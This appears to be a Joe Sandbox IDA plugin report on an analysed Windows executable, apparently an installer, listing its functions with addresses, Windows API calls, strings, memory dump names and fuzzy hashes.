Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: 9ba9d7b7418b74f48756624976096bebc6fb66c7a646a8b19f5d3d1e069ceb03
Instruction ID: 86f537f0b59e140ef7690159b30d1f2105a0adb91ae91f828a802e84d443a7b9
Opcode Fuzzy Hash: 9ba9d7b7418b74f48756624976096bebc6fb66c7a646a8b19f5d3d1e069ceb03
Instruction Fuzzy Hash: 4AF0BD72741220ABE710AB598C85FA632ECAB0D715F16017ABA05EF286C679DC4087A8

Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0041EE74
IsWindowEnabled.USER32(?), ref: 0041EE7E
EnableWindow.USER32(?,00000000), ref: 0041EEA4

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: 908e1640c45beef437f125b63470cd7f97cb81b788dbbb5d15c196427eefded0
Instruction ID: 2c5c4f0331a1d41ebe9848165d0c8b98450d8d3461f9c723900bbadb0b89b381
Opcode Fuzzy Hash: 908e1640c45beef437f125b63470cd7f97cb81b788dbbb5d15c196427eefded0
Instruction Fuzzy Hash: 2DE0E5B81003006EE310AB2BEC81A57779CAB55354F55843BAC0997292D63ED8509ABD

Function 00469FE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 0046A0F1

Strings

PrepareToInstall, xrefs: 0046A09B, 0046A142

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveWindow
String ID: PrepareToInstall
API String ID: 2558294473-1101760603
Opcode ID: b7687f3bb43c73226d704110cc29f9815bff5a15c1e12b08bb6fc701f5c431d6
Instruction ID: 8b7f344ad1fa3e917ae8cfb2dbd3f87d9064e965c7569195748e39604a53e5b8
Opcode Fuzzy Hash: b7687f3bb43c73226d704110cc29f9815bff5a15c1e12b08bb6fc701f5c431d6
Instruction Fuzzy Hash: D2A11934A00109DFCB00EF99D986EDEB7F5AF49304F5540B6E804AB366D738AE45CB5A

Function 0046C5BC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

/:*?"<>|, xrefs: 0046C758, 0046C76F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: /:*?"<>|
API String ID: 0-4078764451
Opcode ID: 06161939b9b6972920a3f4778fa34d5926bec049205355badb073ad507413406
Instruction ID: 6f1ddb1d4c6bf41fe4e6ef022f3ca721468d6fb529cb74a3921b09cafe59df1d
Opcode Fuzzy Hash: 06161939b9b6972920a3f4778fa34d5926bec049205355badb073ad507413406
Instruction Fuzzy Hash: BB719270A44205ABEB20F765DCC2BEE77A19B41348F10C077F580BB292E779AD49875E

Function 00482AAC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00482B5A

Strings

InitializeWizard, xrefs: 00482AF3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: 9aeb3d77867af7e6d972f6b1feb637164b3d788d95ca79b69b372c6f9b450635
Instruction ID: db7d1b329271c039a587c966101a95f378ab38c3ed45019f3272f41b6ba32bbe
Opcode Fuzzy Hash: 9aeb3d77867af7e6d972f6b1feb637164b3d788d95ca79b69b372c6f9b450635
Instruction Fuzzy Hash: 6D115E31A09200AFD715FF29ED86B1A7BE4E759328F60443BE404872A1DA79AC46DB1D

Function 0047C978 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047CBC4,00000000,0047CDC6), ref: 0047C9BD

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C98D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: 3fa2b444f585c7e393a4e745fedb745ede847577bf0d6d8f1446cdfeccc58e1e
Instruction ID: f187297608c4c2e120c43e334d4fef3d14aa164232434ebce48173692ca83dca
Opcode Fuzzy Hash: 3fa2b444f585c7e393a4e745fedb745ede847577bf0d6d8f1446cdfeccc58e1e
Instruction Fuzzy Hash: BAF089E170451467DA10A56A5C82BAE679D8B44758F20407FF608DB342D9B99D02435C

Function 0046F0AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F72A,?,?,00000000,0046F8EE,?,_is1,?), ref: 0046F0BF

Strings

NoModify, xrefs: 0046F0BD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value
String ID: NoModify
API String ID: 3702945584-1699962838
Opcode ID: f62fff895c5cb5fcee211893b33144f563fc8351df9822a4020ec110b25f01ba
Instruction ID: ad59d6647e2c6f1a966119a9b7040c47703766c51ad9b847bf72baa1670be9f7
Opcode Fuzzy Hash: f62fff895c5cb5fcee211893b33144f563fc8351df9822a4020ec110b25f01ba
Instruction Fuzzy Hash: 48E04FB4644304BFEB04DB95DD4AF6BB7ECDB48710F10405ABA04DB381E674FE008658

Function 0042DE2C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DE46

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows
API String ID: 71445658-1109719901
Opcode ID: 0f77c8ce853619a5698b89c9811bea03ab3af1fee96e2778c5ec7c5c80741e7e
Instruction ID: abe9ee1dba80eab6c976627f4fe301d03bda2a195c3818943ffea28d54d696bb
Opcode Fuzzy Hash: 0f77c8ce853619a5698b89c9811bea03ab3af1fee96e2778c5ec7c5c80741e7e
Instruction Fuzzy Hash: E7D0C7729501287BD7009A89DC41DFB775DDB15760F41441BFD1897101C1B4EC5197F8

Function 0047E8F8 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,?,00000001,00000000,0047EBD7,?,-0000001A,00480A90,-00000010,?,00000004,0000001C,00000000,00480DDD,?,0045DC10), ref: 0047E96E

Part of subcall function 0042E32C: GetDC.USER32(00000000), ref: 0042E33B
Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 0042E366
Part of subcall function 0042E32C: ReleaseDC.USER32(00000000,?), ref: 0042E37E

SendNotifyMessageA.USER32(00020434,00000496,00002711,-00000001), ref: 0047EB3E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: EnumFontsMessageNotifyReleaseSend
String ID:
API String ID: 2649214853-0
Opcode ID: 11d352caf6cf76a194d8beb9d25bd90a8a3644bbb7cae3402d6ea1b77134e9b7
Instruction ID: ea9abfd011146b73e97573b99a0886535bf82ee2c4f6ab80840a8034e1b56658
Opcode Fuzzy Hash: 11d352caf6cf76a194d8beb9d25bd90a8a3644bbb7cae3402d6ea1b77134e9b7
Instruction Fuzzy Hash: 5D51BA746001008BCB10FF26D98169B7BA9EB99309B90C67BA4099F367D73CED46C79D

Function 00402088 Relevance: 3.1, APIs: 2, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049C420,00000000,004021FC), ref: 004020CB

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: 4fc8355347e9e1d4ccec0041d5b636f63783e5cfbebeb868820e8a41b8702e1d
Instruction ID: 6f01476fa854e093772c88cc0e1a6b3f7d7d3886978438045dd483ce2d71c460
Opcode Fuzzy Hash: 4fc8355347e9e1d4ccec0041d5b636f63783e5cfbebeb868820e8a41b8702e1d
Instruction Fuzzy Hash: FA41D3B2F403019FDB10CF68DD9522A77A4F7A9324F15417BD854A77E1D3789841CB98

Function 0042DC10 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 80665b2cde9ee57e522dd8711412eaf931e33ec8b5fc09fadae09ede8aa250e9
Instruction ID: 688ca5bec861f28c2d3c56c4d9756a3eee1da68b680b0c58c854c6ce0276e007
Opcode Fuzzy Hash: 80665b2cde9ee57e522dd8711412eaf931e33ec8b5fc09fadae09ede8aa250e9
Instruction Fuzzy Hash: BA414171E00529AFDB11DF95D881BAFB7B8BF40714F90846AE800F7241D778AE40CBA9

Function 0042DED0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseEnum
String ID:
API String ID: 2818636725-0
Opcode ID: 26f8c79d0474c179cb5d82a07cc8f4ff1f384b49e5c41d63d2cbffb4f08ced28
Instruction ID: 7da1df7d23dc80ab26fde5356f239728af9ce1fcf96cfee1e9d17441f3ac576c
Opcode Fuzzy Hash: 26f8c79d0474c179cb5d82a07cc8f4ff1f384b49e5c41d63d2cbffb4f08ced28
Instruction Fuzzy Hash: E0317170F04258AEDB11DFA2DD82BAEB7B9EB44304F91447BE501E7291D6785E01CA2D

Function 0045285C Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,?,?,00458320,00000000,00458308,?,?,?,00000000,004528D6,?,?,?,00000001), ref: 004528B0
GetLastError.KERNEL32(00000000,00000000,?,?,00458320,00000000,00458308,?,?,?,00000000,004528D6,?,?,?,00000001), ref: 004528B8

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID:
API String ID: 2919029540-0
Opcode ID: a1edda8d9d43bdf6393d164a5935c6c7d72f205fa9b275187b219f24b5744e4f
Instruction ID: f1ff12a52b9ae97e51c0fc8bedc9ee5f8128ff8695a74900dad41ba9f3169ab0
Opcode Fuzzy Hash: a1edda8d9d43bdf6393d164a5935c6c7d72f205fa9b275187b219f24b5744e4f
Instruction Fuzzy Hash: D1113C72604208BF8B40DEA9DD41D9F77ECEB4D310B114567FD08D3241D674AD148B68

Function 0040ADE8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AE02
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF5F,00000000,0040AF77,?,?,?,00000000), ref: 0040AE13

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: c2324eb5359665644a5176f1cf96553f9563edd3f7959fa6b260dc2c350a5fba
Instruction ID: 0dcf9cb85912d996b0f29ff8386446a7da443b122bfb24013de7d2ae06ed8127
Opcode Fuzzy Hash: c2324eb5359665644a5176f1cf96553f9563edd3f7959fa6b260dc2c350a5fba
Instruction Fuzzy Hash: FB01F271300300AFDB00EFA9DC92E1A77EDEB49758B108077F500AB3D1DA39AC1096AA

Function 0041EEB4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041EF03
EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Thread$CurrentEnumWindows
String ID:
API String ID: 2396873506-0
Opcode ID: 4f64f9abf12c4e0f4ed6bfdbad4522da757f8f173b64a0d5440e5a48dfcb49d5
Instruction ID: 5ea5535e16dbd3a66c9b103d663da150a627407ba9bd10677b5e32ddf65fd45d
Opcode Fuzzy Hash: 4f64f9abf12c4e0f4ed6bfdbad4522da757f8f173b64a0d5440e5a48dfcb49d5
Instruction Fuzzy Hash: E9016D75A04704BFD305CF6AEC1195ABBF9E749720B22C877EC04D3690E7385820DE9A

Function 00452CF4 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00452D36
GetLastError.KERNEL32(00000000,00000000,00000000,00452D5C), ref: 00452D3E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastMove
String ID:
API String ID: 55378915-0
Opcode ID: c4b48003847f0ed345a39601a16e4078adce9229b20c3b289e599ac23a84d65a
Instruction ID: 4fca69a62489ebc4a01fefb46b4f56da8e9c918d1d9d85a0206be36eb6df5136
Opcode Fuzzy Hash: c4b48003847f0ed345a39601a16e4078adce9229b20c3b289e599ac23a84d65a
Instruction Fuzzy Hash: 8501D671B04208BB8710EB7A9D4149EB7FCDB8A725760457BFC04E3642EAB85E088558

Function 004527E4 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00452843), ref: 0045281D
GetLastError.KERNEL32(00000000,00000000,00000000,00452843), ref: 00452825

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 59bd06d30fc0fe818f6078148c6ffd212d90badc892a263c44d6fa9860574bcf
Instruction ID: 740ef451bc259a1e9a82c9a6d4ec6f858251f5182fd79d8d66273d0612a28aea
Opcode Fuzzy Hash: 59bd06d30fc0fe818f6078148c6ffd212d90badc892a263c44d6fa9860574bcf
Instruction Fuzzy Hash: E2F02871A04704BBCB00EFF5AD0159EB3E8DB4A315B1046BBFC04E3242E6B94E048698

Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00423259
LoadCursorA.USER32(00000000,00000000), ref: 00423283

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: f50906273b4dd4b76e2408c8e955edc8cf5c14898db3d3c1ed1d0f377b452c19
Instruction ID: 8f8c17a0fbd4bdfe9a7359f041206873b2ad7c2d9544917d76f3b93295b1a640
Opcode Fuzzy Hash: f50906273b4dd4b76e2408c8e955edc8cf5c14898db3d3c1ed1d0f377b452c19
Instruction Fuzzy Hash: ABF0EC11704214EBDA109E7E6CC0E2A72A8DB91B36B7103BBFE3AD72D1C62E1D41427D

Function 0042E3A4 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 5776663e4489aa5ac087f663c1a997a3c9318ec70fb50d0ef56642908a6b2f90
Instruction ID: a9e68ab2b12e17ae16f3f6d0a0ea7eea8a26f05c835edb8546f20125b23269b3
Opcode Fuzzy Hash: 5776663e4489aa5ac087f663c1a997a3c9318ec70fb50d0ef56642908a6b2f90
Instruction Fuzzy Hash: 47F08270B14744BFDB119F779C6282BBBECE749B1179248B6F810E3691E67D48108928

Function 0047CD0F Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

